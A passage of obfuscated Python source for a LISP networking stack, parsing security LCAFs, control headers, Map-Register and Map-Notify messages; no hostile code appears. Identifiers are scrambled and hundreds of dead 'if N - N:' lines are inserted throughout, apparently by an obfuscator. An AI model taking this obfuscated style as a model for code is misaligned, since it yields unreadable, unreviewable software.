if 86 - 86: I11i % I11i - OoOoOO00 + I1Ii111 / I1IiiI * OoooooooOO
if 26 - 26: II111iiii * iII111i + o0oOOo0O0Ooo / O0 + i1IIi - I11i
if 56 - 56: OOooOOo
if ( lcaf_len == 0 ) :
Iii1iIII1Iii = "HHBBH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 76 - 76: i1IIi % iIii1I11I1II1 - o0oOOo0O0Ooo + IiII - I11i
O0ooO0O00oo0 , OOOo00o , ooOoOoOo , OOOo00o , lcaf_len = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 9 - 9: I11i - II111iiii + I1Ii111 / oO0o % I1ii11iIi11i
if 17 - 17: iIii1I11I1II1 - ooOoO0o
if ( ooOoOoOo != LISP_LCAF_SECURITY_TYPE ) :
packet = packet [ lcaf_len + 6 : : ]
return ( packet )
if 99 - 99: Oo0Ooo + I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
lcaf_len = socket . ntohs ( lcaf_len )
packet = packet [ oOoOo000Ooooo : : ]
if 52 - 52: I1ii11iIi11i
if 93 - 93: iII111i . i11iIiiIii
if 24 - 24: OOooOOo . OoO0O00 + I1Ii111 . oO0o - I1ii11iIi11i % iII111i
if 49 - 49: O0 . Oo0Ooo / Ii1I
if 29 - 29: I1ii11iIi11i / oO0o * O0 - i11iIiiIii - OoO0O00 + Ii1I
if 86 - 86: I1IiiI / I1ii11iIi11i * Ii1I % i11iIiiIii
ooOoOoOo = LISP_LCAF_SECURITY_TYPE
Iii1iIII1Iii = "BBBBH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 20 - 20: iII111i . OoooooooOO + iII111i + ooOoO0o * I1ii11iIi11i
i1IIiiI1iii1 , OOOo00o , i1iII1i , OOOo00o , iI111I = struct . unpack ( Iii1iIII1Iii ,
packet [ : oOoOo000Ooooo ] )
if 100 - 100: iII111i / o0oOOo0O0Ooo
if 11 - 11: I1ii11iIi11i * OoOoOO00 % i11iIiiIii - Ii1I
if 77 - 77: II111iiii - o0oOOo0O0Ooo . I1ii11iIi11i
if 63 - 63: oO0o
if 79 - 79: I1ii11iIi11i - oO0o - o0oOOo0O0Ooo . OOooOOo
if 65 - 65: i11iIiiIii . OoO0O00 % iII111i + IiII - i11iIiiIii
packet = packet [ oOoOo000Ooooo : : ]
iI111I = socket . ntohs ( iI111I )
if ( len ( packet ) < iI111I ) : return ( None )
if 60 - 60: I1Ii111
if 14 - 14: Oo0Ooo % oO0o * iII111i - i11iIiiIii / I1ii11iIi11i * i11iIiiIii
if 95 - 95: iIii1I11I1II1 + OoOoOO00 . I1IiiI + OoOoOO00 * I11i + OOooOOo
if 14 - 14: Ii1I - O0
OoOO0Ooo = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM , LISP_CS_25519_CHACHA ,
LISP_CS_1024 ]
if ( i1iII1i not in OoOO0Ooo ) :
lprint ( "Cipher-suites {} supported, received {}" . format ( OoOO0Ooo ,
i1iII1i ) )
packet = packet [ iI111I : : ]
return ( packet )
if 95 - 95: OoO0O00 - IiII % I1Ii111
if 27 - 27: iIii1I11I1II1 / I1IiiI % OoOoOO00 / I1IiiI * Ii1I
self . cipher_suite = i1iII1i
if 13 - 13: iII111i . iII111i + i11iIiiIii % O0 % I1Ii111 + IiII
if 42 - 42: i1IIi + iII111i . OoooooooOO + I1ii11iIi11i . I11i / Ii1I
if 1 - 1: o0oOOo0O0Ooo
if 95 - 95: OOooOOo / i1IIi % OoO0O00 . I1Ii111 + I1Ii111
if 80 - 80: O0 + I1ii11iIi11i + OOooOOo
oOO = 0
for OoOOoO0oOo in range ( 0 , iI111I , 8 ) :
III11II111 = byte_swap_64 ( struct . unpack ( "Q" , packet [ OoOOoO0oOo : OoOOoO0oOo + 8 ] ) [ 0 ] )
oOO <<= 64
oOO |= III11II111
if 95 - 95: I1ii11iIi11i
self . remote_public_key = oOO
if 98 - 98: IiII * iII111i . OoooooooOO . O0
if 89 - 89: iII111i / O0 % OoooooooOO - O0 . OoO0O00
if 32 - 32: ooOoO0o
if 26 - 26: O0 * Ii1I - I1IiiI - iII111i / iIii1I11I1II1
if 57 - 57: I1ii11iIi11i - OoO0O00 * iIii1I11I1II1
if ( self . curve25519 ) :
III11II111 = lisp_hex_string ( self . remote_public_key )
III11II111 = III11II111 . zfill ( 64 )
II111IiI11i = ""
for OoOOoO0oOo in range ( 0 , len ( III11II111 ) , 2 ) :
II111IiI11i += chr ( int ( III11II111 [ OoOOoO0oOo : OoOOoO0oOo + 2 ] , 16 ) )
if 91 - 91: II111iiii . Oo0Ooo . oO0o - OoooooooOO / OoOoOO00
self . remote_public_key = II111IiI11i
if 30 - 30: I11i % o0oOOo0O0Ooo + i1IIi * OoooooooOO * OoO0O00 - II111iiii
if 55 - 55: OoO0O00
packet = packet [ iI111I : : ]
return ( packet )
if 20 - 20: ooOoO0o * I1Ii111 * o0oOOo0O0Ooo - ooOoO0o
if 32 - 32: Ii1I * oO0o
if 85 - 85: i11iIiiIii . OoO0O00 + OoO0O00
if 28 - 28: Oo0Ooo
if 62 - 62: Oo0Ooo + OoooooooOO / iII111i
if 60 - 60: Ii1I / OoOoOO00 . I11i % OOooOOo
if 61 - 61: O0 . Ii1I . O0 * i11iIiiIii * II111iiii / I1Ii111
if 69 - 69: I11i
class lisp_thread ( object ) :
def __init__ ( self , name ) :
self . thread_name = name
self . thread_number = - 1
self . number_of_pcap_threads = 0
self . number_of_worker_threads = 0
self . input_queue = queue . Queue ( )
self . input_stats = lisp_stats ( )
self . lisp_packet = lisp_packet ( None )
if 17 - 17: I11i
if 38 - 38: I1Ii111 % OOooOOo
if 9 - 9: O0 . iIii1I11I1II1
if 44 - 44: I1ii11iIi11i % IiII
if 6 - 6: OoO0O00
if 82 - 82: iIii1I11I1II1 . I11i / IiII / OOooOOo * II111iiii % oO0o
if 62 - 62: II111iiii
if 96 - 96: I11i % OoOoOO00 * I1ii11iIi11i
if 94 - 94: Oo0Ooo - i1IIi . O0 % Oo0Ooo . ooOoO0o
if 63 - 63: i11iIiiIii % I1ii11iIi11i % I1IiiI . IiII * o0oOOo0O0Ooo + OOooOOo
if 77 - 77: o0oOOo0O0Ooo
if 63 - 63: ooOoO0o * oO0o + ooOoO0o * Ii1I + Oo0Ooo / I1ii11iIi11i
if 15 - 15: O0 . I1ii11iIi11i * I1ii11iIi11i
if 65 - 65: I1Ii111 + O0 % o0oOOo0O0Ooo
if 72 - 72: OOooOOo . OoOoOO00 / II111iiii
if 69 - 69: OOooOOo * II111iiii - ooOoO0o - i1IIi + i11iIiiIii
if 50 - 50: OoooooooOO * i1IIi / oO0o
if 83 - 83: i1IIi
class lisp_control_header ( object ) :
def __init__ ( self ) :
self . type = 0
self . record_count = 0
self . nonce = 0
self . rloc_probe = False
self . smr_bit = False
self . smr_invoked_bit = False
self . ddt_bit = False
self . to_etr = False
self . to_ms = False
self . info_reply = False
if 38 - 38: OoooooooOO * iIii1I11I1II1
if 54 - 54: OoooooooOO . I1Ii111
def decode ( self , packet ) :
Iii1iIII1Iii = "BBBBQ"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( False )
if 71 - 71: Ii1I
I1iI1Ii1I1Iii1 , ii1i , OO00O0O00oOOO , self . record_count , self . nonce = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 17 - 17: ooOoO0o
if 25 - 25: Ii1I * iIii1I11I1II1 * o0oOOo0O0Ooo + OoOoOO00 . OoOoOO00
self . type = I1iI1Ii1I1Iii1 >> 4
if ( self . type == LISP_MAP_REQUEST ) :
self . smr_bit = True if ( I1iI1Ii1I1Iii1 & 0x01 ) else False
self . rloc_probe = True if ( I1iI1Ii1I1Iii1 & 0x02 ) else False
self . smr_invoked_bit = True if ( ii1i & 0x40 ) else False
if 3 - 3: OoO0O00 . I1IiiI . I11i . I1ii11iIi11i
if ( self . type == LISP_ECM ) :
self . ddt_bit = True if ( I1iI1Ii1I1Iii1 & 0x04 ) else False
self . to_etr = True if ( I1iI1Ii1I1Iii1 & 0x02 ) else False
self . to_ms = True if ( I1iI1Ii1I1Iii1 & 0x01 ) else False
if 19 - 19: O0 * I11i % OoooooooOO
if ( self . type == LISP_NAT_INFO ) :
self . info_reply = True if ( I1iI1Ii1I1Iii1 & 0x08 ) else False
if 36 - 36: o0oOOo0O0Ooo % I11i * I1ii11iIi11i % Ii1I + i1IIi - Oo0Ooo
return ( True )
if 56 - 56: I1ii11iIi11i
if 32 - 32: OoOoOO00 % O0 % i11iIiiIii - ooOoO0o . I1IiiI
def is_info_request ( self ) :
return ( ( self . type == LISP_NAT_INFO and self . is_info_reply ( ) == False ) )
if 24 - 24: oO0o % o0oOOo0O0Ooo / I1Ii111 + o0oOOo0O0Ooo
if 59 - 59: II111iiii % I1IiiI * O0 . OoooooooOO - OoooooooOO % O0
def is_info_reply ( self ) :
return ( True if self . info_reply else False )
if 56 - 56: oO0o - i1IIi * OoooooooOO - II111iiii
if 28 - 28: i1IIi / I11i . o0oOOo0O0Ooo
def is_rloc_probe ( self ) :
return ( True if self . rloc_probe else False )
if 11 - 11: Oo0Ooo * OoooooooOO - i11iIiiIii
if 13 - 13: i11iIiiIii . O0 / OOooOOo * i1IIi
def is_smr ( self ) :
return ( True if self . smr_bit else False )
if 14 - 14: IiII + IiII . I11i / Ii1I . iIii1I11I1II1
if 10 - 10: II111iiii . OOooOOo / iII111i
def is_smr_invoked ( self ) :
return ( True if self . smr_invoked_bit else False )
if 35 - 35: iII111i / Oo0Ooo + O0 * iIii1I11I1II1 - O0
if 3 - 3: I1ii11iIi11i
def is_ddt ( self ) :
return ( True if self . ddt_bit else False )
if 42 - 42: I11i % Oo0Ooo + IiII - I11i . iIii1I11I1II1 - Ii1I
if 27 - 27: iII111i % Oo0Ooo . I1ii11iIi11i . i1IIi % OoOoOO00 . o0oOOo0O0Ooo
def is_to_etr ( self ) :
return ( True if self . to_etr else False )
if 37 - 37: iII111i + I1Ii111 * Ii1I + IiII
if 39 - 39: O0 * Oo0Ooo - I1IiiI + Ii1I / II111iiii
def is_to_ms ( self ) :
return ( True if self . to_ms else False )
if 66 - 66: ooOoO0o + oO0o % OoooooooOO
if 23 - 23: oO0o . OoOoOO00 + iIii1I11I1II1
if 17 - 17: IiII
if 12 - 12: i1IIi . OoO0O00
if 14 - 14: OOooOOo + II111iiii % OOooOOo . oO0o * ooOoO0o
if 54 - 54: ooOoO0o * I11i - I1Ii111
if 15 - 15: iII111i / O0
if 61 - 61: i1IIi / i1IIi + ooOoO0o . I1Ii111 * ooOoO0o
if 19 - 19: o0oOOo0O0Ooo . II111iiii / i1IIi
if 82 - 82: O0 / iII111i * OoO0O00 - I11i + Oo0Ooo
if 47 - 47: I1ii11iIi11i * I1IiiI / I1ii11iIi11i + Ii1I * II111iiii
if 78 - 78: I1Ii111 - i1IIi + OoOoOO00 + Oo0Ooo * I1ii11iIi11i * o0oOOo0O0Ooo
if 97 - 97: i1IIi
if 29 - 29: I1IiiI
if 37 - 37: I1ii11iIi11i * I1Ii111 * I1IiiI * O0
if 35 - 35: I1IiiI - I1ii11iIi11i * iII111i + IiII / i1IIi
if 46 - 46: Oo0Ooo . ooOoO0o % Oo0Ooo / II111iiii * ooOoO0o * OOooOOo
if 59 - 59: I1Ii111 * iII111i
if 31 - 31: I11i / O0
if 57 - 57: i1IIi % ooOoO0o
if 69 - 69: o0oOOo0O0Ooo
if 69 - 69: I1Ii111
if 83 - 83: iIii1I11I1II1 . o0oOOo0O0Ooo + I1Ii111 . OoooooooOO / ooOoO0o + II111iiii
if 90 - 90: Ii1I * iII111i / OOooOOo
if 68 - 68: OoOoOO00
if 65 - 65: oO0o
if 82 - 82: o0oOOo0O0Ooo
if 80 - 80: i1IIi % OoOoOO00 + OoO0O00 - OoooooooOO / iIii1I11I1II1 + I1Ii111
if 65 - 65: Ii1I
if 71 - 71: I1Ii111 % I1Ii111 . oO0o + i11iIiiIii - i11iIiiIii
if 16 - 16: iIii1I11I1II1 / I1IiiI / I1Ii111 - i11iIiiIii . ooOoO0o / OOooOOo
if 13 - 13: o0oOOo0O0Ooo % O0 - I1Ii111 * OoooooooOO / Oo0Ooo - OoooooooOO
if 78 - 78: oO0o % OoooooooOO
if 73 - 73: I1IiiI % ooOoO0o % IiII + i1IIi - OoooooooOO / oO0o
if 78 - 78: OoooooooOO % oO0o - i11iIiiIii
if 37 - 37: IiII % Ii1I % i1IIi
if 23 - 23: ooOoO0o - O0 + i11iIiiIii
if 98 - 98: OoooooooOO
if 61 - 61: o0oOOo0O0Ooo . IiII . O0 + OoooooooOO + O0
if 65 - 65: i1IIi * OOooOOo * OoooooooOO - IiII . iII111i - OoO0O00
if 71 - 71: Ii1I * OoOoOO00
if 33 - 33: i1IIi . i1IIi * OoooooooOO % I1Ii111 * o0oOOo0O0Ooo
if 64 - 64: ooOoO0o / ooOoO0o + I1ii11iIi11i * OOooOOo % OOooOOo
if 87 - 87: OoO0O00 * Oo0Ooo
if 83 - 83: i1IIi * I1Ii111 - IiII / Ii1I
if 48 - 48: oO0o . II111iiii - OoOoOO00 % i1IIi . OoOoOO00
if 32 - 32: Ii1I * I1IiiI - OOooOOo . Oo0Ooo / O0 + Ii1I
if 67 - 67: OoOoOO00 % Oo0Ooo
if 7 - 7: i11iIiiIii % I1ii11iIi11i / I1Ii111 % Oo0Ooo - OoO0O00
class lisp_map_register ( object ) :
def __init__ ( self ) :
self . proxy_reply_requested = False
self . lisp_sec_present = False
self . xtr_id_present = False
self . map_notify_requested = False
self . mobile_node = False
self . merge_register_requested = False
self . use_ttl_for_timeout = False
self . map_register_refresh = False
self . record_count = 0
self . nonce = 0
self . alg_id = 0
self . key_id = 0
self . auth_len = 0
self . auth_data = 0
self . xtr_id = 0
self . site_id = 0
self . record_count = 0
self . sport = 0
self . encrypt_bit = 0
self . encryption_key_id = None
if 73 - 73: I1ii11iIi11i
if 92 - 92: i11iIiiIii + O0 * I11i
def print_map_register ( self ) :
oOOoO = lisp_hex_string ( self . xtr_id )
if 1 - 1: II111iiii
i11 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}" )
if 44 - 44: i11iIiiIii
lprint ( i11 . format ( bold ( "Map-Register" , False ) , "P" if self . proxy_reply_requested else "p" ,
# O0 - O0 % I1Ii111 / I1ii11iIi11i
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_ttl_for_timeout else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node else "m" ,
"N" if self . map_notify_requested else "n" ,
"F" if self . map_register_refresh else "f" ,
"E" if self . encrypt_bit else "e" ,
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , oOOoO , self . site_id ) )
if 76 - 76: OoO0O00 * oO0o - OoO0O00
if 57 - 57: OoooooooOO / OoOoOO00 + oO0o . Ii1I
if 14 - 14: i11iIiiIii % OOooOOo * o0oOOo0O0Ooo * OoOoOO00
if 55 - 55: I1Ii111 * OOooOOo * I1Ii111
def encode ( self ) :
oOOOoOO = ( LISP_MAP_REGISTER << 28 ) | self . record_count
if ( self . proxy_reply_requested ) : oOOOoOO |= 0x08000000
if ( self . lisp_sec_present ) : oOOOoOO |= 0x04000000
if ( self . xtr_id_present ) : oOOOoOO |= 0x02000000
if ( self . map_register_refresh ) : oOOOoOO |= 0x1000
if ( self . use_ttl_for_timeout ) : oOOOoOO |= 0x800
if ( self . merge_register_requested ) : oOOOoOO |= 0x400
if ( self . mobile_node ) : oOOOoOO |= 0x200
if ( self . map_notify_requested ) : oOOOoOO |= 0x100
if ( self . encryption_key_id != None ) :
oOOOoOO |= 0x2000
oOOOoOO |= self . encryption_key_id << 14
if 70 - 70: O0 . Ii1I
if 33 - 33: OOooOOo * Ii1I
if 64 - 64: i11iIiiIii . iIii1I11I1II1
if 7 - 7: OoOoOO00 % ooOoO0o + OoOoOO00 - OoOoOO00 * i11iIiiIii % OoO0O00
if 57 - 57: OOooOOo / OoO0O00 + I1ii11iIi11i
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . auth_len = 0
else :
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
self . auth_len = LISP_SHA1_160_AUTH_DATA_LEN
if 60 - 60: O0 * Oo0Ooo % OOooOOo + IiII . OoO0O00 . Oo0Ooo
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
self . auth_len = LISP_SHA2_256_AUTH_DATA_LEN
if 70 - 70: I11i . I1ii11iIi11i * oO0o
if 97 - 97: oO0o . iIii1I11I1II1 - OOooOOo
if 23 - 23: I1ii11iIi11i % I11i
OO0Oo00OO0oo = struct . pack ( "I" , socket . htonl ( oOOOoOO ) )
OO0Oo00OO0oo += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 18 - 18: OoooooooOO . i1IIi + II111iiii
OO0Oo00OO0oo = self . zero_auth ( OO0Oo00OO0oo )
return ( OO0Oo00OO0oo )
if 99 - 99: I1Ii111 - I1ii11iIi11i - I1IiiI - I1Ii111 + OoO0O00 + II111iiii
if 34 - 34: I1Ii111 * I11i
def zero_auth ( self , packet ) :
IiI1ii1Ii = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
i1oO0o00oOo00oO = b""
OoooOOO0 = 0
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
i1oO0o00oOo00oO = struct . pack ( "QQI" , 0 , 0 , 0 )
OoooOOO0 = struct . calcsize ( "QQI" )
if 99 - 99: Ii1I - IiII - i1IIi / i11iIiiIii . IiII
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
i1oO0o00oOo00oO = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
OoooOOO0 = struct . calcsize ( "QQQQ" )
if 58 - 58: OOooOOo
packet = packet [ 0 : IiI1ii1Ii ] + i1oO0o00oOo00oO + packet [ IiI1ii1Ii + OoooOOO0 : : ]
return ( packet )
if 12 - 12: I1IiiI . o0oOOo0O0Ooo * OoooooooOO
if 64 - 64: OoOoOO00 + IiII - i1IIi . II111iiii . OoO0O00
def encode_auth ( self , packet ) :
IiI1ii1Ii = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
OoooOOO0 = self . auth_len
i1oO0o00oOo00oO = self . auth_data
packet = packet [ 0 : IiI1ii1Ii ] + i1oO0o00oOo00oO + packet [ IiI1ii1Ii + OoooOOO0 : : ]
return ( packet )
if 31 - 31: oO0o . iII111i - I11i . iIii1I11I1II1 + I11i . OoOoOO00
if 86 - 86: I1ii11iIi11i - I1ii11iIi11i / iII111i - I1ii11iIi11i * iII111i + I1Ii111
def decode ( self , packet ) :
OOooo = packet
Iii1iIII1Iii = "I"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( [ None , None ] )
if 39 - 39: i1IIi
oOOOoOO = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
oOOOoOO = socket . ntohl ( oOOOoOO [ 0 ] )
packet = packet [ oOoOo000Ooooo : : ]
if 55 - 55: II111iiii * iII111i / OoooooooOO
Iii1iIII1Iii = "QBBH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( [ None , None ] )
if 68 - 68: IiII
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 20 - 20: OoO0O00 / i11iIiiIii - i1IIi
if 46 - 46: OOooOOo - Oo0Ooo % iII111i % i11iIiiIii
self . nonce = byte_swap_64 ( self . nonce )
self . auth_len = socket . ntohs ( self . auth_len )
self . proxy_reply_requested = True if ( oOOOoOO & 0x08000000 ) else False
if 80 - 80: I11i - I1ii11iIi11i * Ii1I / OoooooooOO * O0 % OOooOOo
self . lisp_sec_present = True if ( oOOOoOO & 0x04000000 ) else False
self . xtr_id_present = True if ( oOOOoOO & 0x02000000 ) else False
self . use_ttl_for_timeout = True if ( oOOOoOO & 0x800 ) else False
self . map_register_refresh = True if ( oOOOoOO & 0x1000 ) else False
self . merge_register_requested = True if ( oOOOoOO & 0x400 ) else False
self . mobile_node = True if ( oOOOoOO & 0x200 ) else False
self . map_notify_requested = True if ( oOOOoOO & 0x100 ) else False
self . record_count = oOOOoOO & 0xff
if 49 - 49: II111iiii . I1IiiI * O0 * Ii1I / I1Ii111 * OoooooooOO
if 82 - 82: Oo0Ooo / Ii1I / Ii1I % Ii1I
if 20 - 20: ooOoO0o
if 63 - 63: iIii1I11I1II1 . OoO0O00
self . encrypt_bit = True if oOOOoOO & 0x2000 else False
if ( self . encrypt_bit ) :
self . encryption_key_id = ( oOOOoOO >> 14 ) & 0x7
if 100 - 100: i1IIi * i1IIi
if 26 - 26: OOooOOo . OoO0O00 % OoOoOO00
if 94 - 94: IiII
if 15 - 15: Ii1I - IiII / O0
if 28 - 28: I1Ii111 . i1IIi / I1ii11iIi11i
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( OOooo ) == False ) : return ( [ None , None ] )
if 77 - 77: i11iIiiIii / I1Ii111 / i11iIiiIii % OoOoOO00 - I1Ii111
if 80 - 80: I1Ii111 % OoOoOO00 . OoooooooOO . II111iiii % IiII
packet = packet [ oOoOo000Ooooo : : ]
if 6 - 6: I1Ii111 % IiII / Ii1I + I1Ii111 . oO0o
if 70 - 70: iIii1I11I1II1 / Ii1I
if 61 - 61: O0 * o0oOOo0O0Ooo + I1Ii111 - OOooOOo . I1IiiI - IiII
if 7 - 7: I1ii11iIi11i
if ( self . auth_len != 0 ) :
if ( len ( packet ) < self . auth_len ) : return ( [ None , None ] )
if 81 - 81: Oo0Ooo % II111iiii % o0oOOo0O0Ooo / I11i
if ( self . alg_id not in ( LISP_NONE_ALG_ID , LISP_SHA_1_96_ALG_ID ,
LISP_SHA_256_128_ALG_ID ) ) :
lprint ( "Invalid authentication alg-id: {}" . format ( self . alg_id ) )
return ( [ None , None ] )
if 95 - 95: OoOoOO00 - O0 % OoooooooOO
if 13 - 13: i11iIiiIii
OoooOOO0 = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
oOoOo000Ooooo = struct . calcsize ( "QQI" )
if ( OoooOOO0 < oOoOo000Ooooo ) :
lprint ( "Invalid sha1-96 authentication length" )
return ( [ None , None ] )
if 54 - 54: OOooOOo . I1ii11iIi11i * I11i % I1Ii111 . O0 * IiII
o00OOOOoOO , Ooo , OoOoo0ooo0 = struct . unpack ( "QQI" , packet [ : OoooOOO0 ] )
oO000oOo0oO0 = b""
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
oOoOo000Ooooo = struct . calcsize ( "QQQQ" )
if ( OoooOOO0 < oOoOo000Ooooo ) :
lprint ( "Invalid sha2-256 authentication length" )
return ( [ None , None ] )
if 2 - 2: o0oOOo0O0Ooo - I1IiiI - i11iIiiIii / OoooooooOO
o00OOOOoOO , Ooo , OoOoo0ooo0 , oO000oOo0oO0 = struct . unpack ( "QQQQ" ,
packet [ : OoooOOO0 ] )
else :
lprint ( "Unsupported authentication alg-id value {}" . format ( self . alg_id ) )
if 87 - 87: o0oOOo0O0Ooo + oO0o + OoooooooOO * OOooOOo
return ( [ None , None ] )
if 50 - 50: Oo0Ooo * i1IIi - I1ii11iIi11i * I1IiiI
self . auth_data = lisp_concat_auth_data ( self . alg_id , o00OOOOoOO , Ooo ,
OoOoo0ooo0 , oO000oOo0oO0 )
OOooo = self . zero_auth ( OOooo )
packet = packet [ self . auth_len : : ]
if 24 - 24: OoOoOO00 * Ii1I
return ( [ OOooo , packet ] )
if 17 - 17: OoO0O00 . I1IiiI * O0
if 81 - 81: OOooOOo
def encode_xtr_id ( self , packet ) :
OooOooo00OOO0o = self . xtr_id >> 64
II1iIIiIII = self . xtr_id & 0xffffffffffffffff
OooOooo00OOO0o = byte_swap_64 ( OooOooo00OOO0o )
II1iIIiIII = byte_swap_64 ( II1iIIiIII )
iI1 = byte_swap_64 ( self . site_id )
packet += struct . pack ( "QQQ" , OooOooo00OOO0o , II1iIIiIII , iI1 )
return ( packet )
if 5 - 5: IiII - I11i
if 16 - 16: IiII . iII111i . Oo0Ooo % OOooOOo / IiII
def decode_xtr_id ( self , packet ) :
oOoOo000Ooooo = struct . calcsize ( "QQQ" )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( [ None , None ] )
packet = packet [ len ( packet ) - oOoOo000Ooooo : : ]
OooOooo00OOO0o , II1iIIiIII , iI1 = struct . unpack ( "QQQ" ,
packet [ : oOoOo000Ooooo ] )
OooOooo00OOO0o = byte_swap_64 ( OooOooo00OOO0o )
II1iIIiIII = byte_swap_64 ( II1iIIiIII )
self . xtr_id = ( OooOooo00OOO0o << 64 ) | II1iIIiIII
self . site_id = byte_swap_64 ( iI1 )
return ( True )
if 72 - 72: o0oOOo0O0Ooo * ooOoO0o - i11iIiiIii / Ii1I
if 11 - 11: O0 - I1IiiI
if 31 - 31: iII111i
if 1 - 1: I1Ii111 / OoOoOO00 * OoOoOO00 - o0oOOo0O0Ooo % Ii1I
if 96 - 96: IiII / Ii1I % OoO0O00 . iIii1I11I1II1
if 30 - 30: I11i - OoO0O00
if 15 - 15: OoooooooOO
if 31 - 31: II111iiii
if 62 - 62: iIii1I11I1II1 % I1Ii111 % I1ii11iIi11i * IiII
if 87 - 87: IiII
if 45 - 45: oO0o + II111iiii * O0 % OOooOOo . iIii1I11I1II1
if 55 - 55: IiII
if 43 - 43: OOooOOo
if 17 - 17: i11iIiiIii
if 94 - 94: OoooooooOO - IiII + oO0o . OoooooooOO / i1IIi
if 53 - 53: I1Ii111 % I1ii11iIi11i
if 17 - 17: OoooooooOO % Ii1I % O0
if 46 - 46: iII111i + I1Ii111 % OoooooooOO * I1ii11iIi11i
if 89 - 89: IiII - IiII % iII111i / I11i + oO0o - IiII
if 97 - 97: Ii1I % OoOoOO00 / I1ii11iIi11i / iIii1I11I1II1 * OoooooooOO * OOooOOo
if 80 - 80: oO0o / O0
if 55 - 55: I1IiiI * I11i / O0 % OoOoOO00
if 71 - 71: i11iIiiIii * OoOoOO00 * OOooOOo + oO0o + Oo0Ooo
if 59 - 59: IiII
if 54 - 54: OOooOOo
if 27 - 27: OoOoOO00 - OoO0O00 + o0oOOo0O0Ooo + ooOoO0o . OoO0O00
if 86 - 86: II111iiii - OoooooooOO - ooOoO0o % iII111i
if 16 - 16: ooOoO0o + Oo0Ooo + OoooooooOO
if 87 - 87: I1IiiI . oO0o / IiII - OoooooooOO
if 33 - 33: oO0o % OoO0O00 . iIii1I11I1II1 / IiII
if 3 - 3: Ii1I + OoO0O00
if 60 - 60: OoO0O00 . OoOoOO00 - I1ii11iIi11i - I1IiiI - II111iiii % Oo0Ooo
if 62 - 62: O0 + iII111i - iII111i % iIii1I11I1II1
class lisp_map_notify ( object ) :
def __init__ ( self , lisp_sockets ) :
self . etr = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . etr_port = 0
self . retransmit_timer = None
self . lisp_sockets = lisp_sockets
self . retry_count = 0
self . record_count = 0
self . alg_id = LISP_NONE_ALG_ID
self . key_id = 0
self . auth_len = 0
self . auth_data = ""
self . nonce = 0
self . nonce_key = ""
self . packet = None
self . site = ""
self . map_notify_ack = False
self . eid_records = ""
self . eid_list = [ ]
if 47 - 47: I1Ii111 + I1IiiI
if 40 - 40: iIii1I11I1II1 % Ii1I + II111iiii - I1IiiI
def print_notify ( self ) :
i1oO0o00oOo00oO = binascii . hexlify ( self . auth_data )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID and len ( i1oO0o00oOo00oO ) != 40 ) :
i1oO0o00oOo00oO = self . auth_data
elif ( self . alg_id == LISP_SHA_256_128_ALG_ID and len ( i1oO0o00oOo00oO ) != 64 ) :
i1oO0o00oOo00oO = self . auth_data
if 80 - 80: oO0o
i11 = ( "{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}" )
lprint ( i11 . format ( bold ( "Map-Notify-Ack" , False ) if self . map_notify_ack else bold ( "Map-Notify" , False ) ,
# I1IiiI * iII111i / OoooooooOO * OoOoOO00 . Oo0Ooo
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , i1oO0o00oOo00oO ) )
if 29 - 29: iII111i . o0oOOo0O0Ooo / o0oOOo0O0Ooo / Ii1I
if 1 - 1: OoooooooOO - i11iIiiIii - OOooOOo + i1IIi - OoOoOO00 - iII111i
if 75 - 75: I1IiiI
if 99 - 99: ooOoO0o . Ii1I
def zero_auth ( self , packet ) :
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
i1oO0o00oOo00oO = struct . pack ( "QQI" , 0 , 0 , 0 )
if 92 - 92: i1IIi
